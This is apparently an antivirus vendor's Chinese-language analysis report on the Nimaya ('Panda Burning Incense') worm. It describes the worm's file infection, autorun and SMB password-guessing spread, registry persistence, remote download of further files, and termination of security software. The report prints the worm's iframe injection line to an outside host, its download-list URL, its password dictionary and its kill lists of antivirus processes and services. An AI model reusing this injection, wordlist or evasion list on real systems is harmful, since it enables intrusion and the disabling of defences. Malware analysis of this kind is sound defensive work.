瑞星最新病毒分析报告：Nimaya（熊猫烧香）

　　这是一个传染型的DownLoad 使用Delphi编写

　　该病毒的主要行为:

　　一.传播

　　1.本地磁盘感染

　　病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行

　　文件遍历感染注:不感染文件大小超过10485760字节以上的.

　　(病毒将不感染如下目录的文件):

　　Microsoft Frontpage

　　Movie Maker

　　MSN Gamin Zone

　　Common Files

　　Windows NT

　　Recycled

　　System Volume Information

　　Documents and Settings

　　....

　　(病毒将不感染文件名如下的文件):

　　setup.exe

　　NTDETECT.COM

　　病毒将使用两类感染方式应对不同后缀的文件名进行感染

　　1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)

　　将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.

　　2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)

　　在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):

　　＜IFRAME src="https://www.krvkr.com/worm.htm" width=height=0＞＜/IFRAME＞

　　在感染时会删除这些磁盘上的后缀名为.GHO

　　2.生成autorun.inf

　　病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成

　　setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联

　　使病毒在用户点击被感染磁盘时能被自动运行.

　　3.局域网传播

　　病毒生成随机几个局域网传播线程实现如下的传播方式:

　　当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典

　　进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务

　　启动激活病毒.

　　被尝试猜测密码的账户号为:

　　Administrator

　　Guest

　　admin

　　Root

　　用来进行密码尝试的字典为:

　　1234

　　password

　　6969

　　harley

　　123456

　　golf

　　pussy

　　mustang

　　1111

　　shadow

　　1313

　　fish

　　5150

　　7777

　　qwerty

　　baseball

　　2112

　　letmein

　　mein

　　12345678

　　12345

　　admin

　　5201314

　　qq520

　　1234567

　　123456789

　　654321

　　54321

　　000000

　　11111111

　　88888888

　　pass

　　passwd

　　database

　　abcd

　　abc123

　　sybase

　　123qwe

　　server

　　computer

　　super

　　123asd

　　ihavenopass

　　godblessyou

　　enable

　　2002

　　2003

　　2600

　　alpha

　　111111

　　121212

　　123123

　　1234qwer

　　123abc

　　patrick

　　administrator

　　ator

　　root

　　fuckyou

　　fuck

　　test

　　test123

　　temp

　　temp123

　　asdf

　　qwer

　　yxcv

　　zxcv

　　home

　　owner

　　login

　　Login

　　pw123

　　love

　　mypc

　　mypc123

　　admin123

　　mypass

　　mypass123

　　901100

　　二.修改操作系统的启动关联

　　病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以

　　1秒钟为周期不断设置如下键值:

　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

　　svcshare=%病毒文件路径%

　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

　　\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

　　CheckedValue=0

　　三.下载文件启动

　　病毒会以20分钟为周期尝试读取特定网站上的下载文件列表

　　如:https://wangma.9966.org/down.txt

　　并根据文件列表指定的文件下载,并启动这些程序.

　　四.与杀毒软件对抗

　　1.关闭包含以下字符串的窗口：

　　防火墙

　　VirusScan

　　NOD32

　　网镖

　　杀毒

　　毒霸

　　瑞星

　　超级兔子

　　优化大师

　　大师

　　木马清道夫

　　木馬清道夫

　　卡巴斯基反病毒

　　Symantec AntiVirus

　　Duba

　　esteem procs

　　绿鹰PC

　　密码防盗

　　噬菌体

　　木马辅助查找器

　　System Safety Monitor

　　Wrapped gift Killer

　　Winsock Expert

　　游戏木马检测大师

　　超级巡警

　　IceSword

　　2.结束以下进程：

　　Mcshield.exe

　　VsTskMgr.exe

　　naPrdMgr.exe

　　UpdaterUI.exe

　　TBMon.exe

　　scan32.exe

　　Ravmond.exe

　　CCenter.exe

　　RavTask.exe

　　Rav.exe

　　Ravmon.exe

　　RavmonD.exe

　　RavStub.exe

　　KVXP.kxp

　　KvMonXP.kxp

　　KVCenter.kxp

　　KVSrvXP.exe

　　KRegEx.exe

　　UIHost.exe

　　TrojDie.kxp

　　FrogAgent.exe

　　Logo1_.exe

　　Logo_1.exe

　　Rundl132.exe

　　regedit.exe

　　msconfig.exe

　　taskmgr.exe

　　3.关闭并删除以下服务：

　　Schedule

　　sharedaccess

　　RsCCenter

　　RsRavMon

　　RsCCenter

　　KVWSC

　　KVSrvXP

　　kavsvc

　　AVP

　　McAfeeFramework

　　McShield

　　McTaskManager

　　navapsvc

　　wscsvc

　　KPfwSvc

　　SNDSrvc

　　ccProxy

　　ccEvtMgr

　　ccSetMgr

　　SPBBCSvc

　　Symantec Core LC

　　NPFMntor

　　MskService

　　FireSvc

　　注:

　　因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有利用安全漏洞进行病毒传播的链接.如果一台服务器被感染将大大增加病毒传播的范围.　

(责任编辑：韩建光)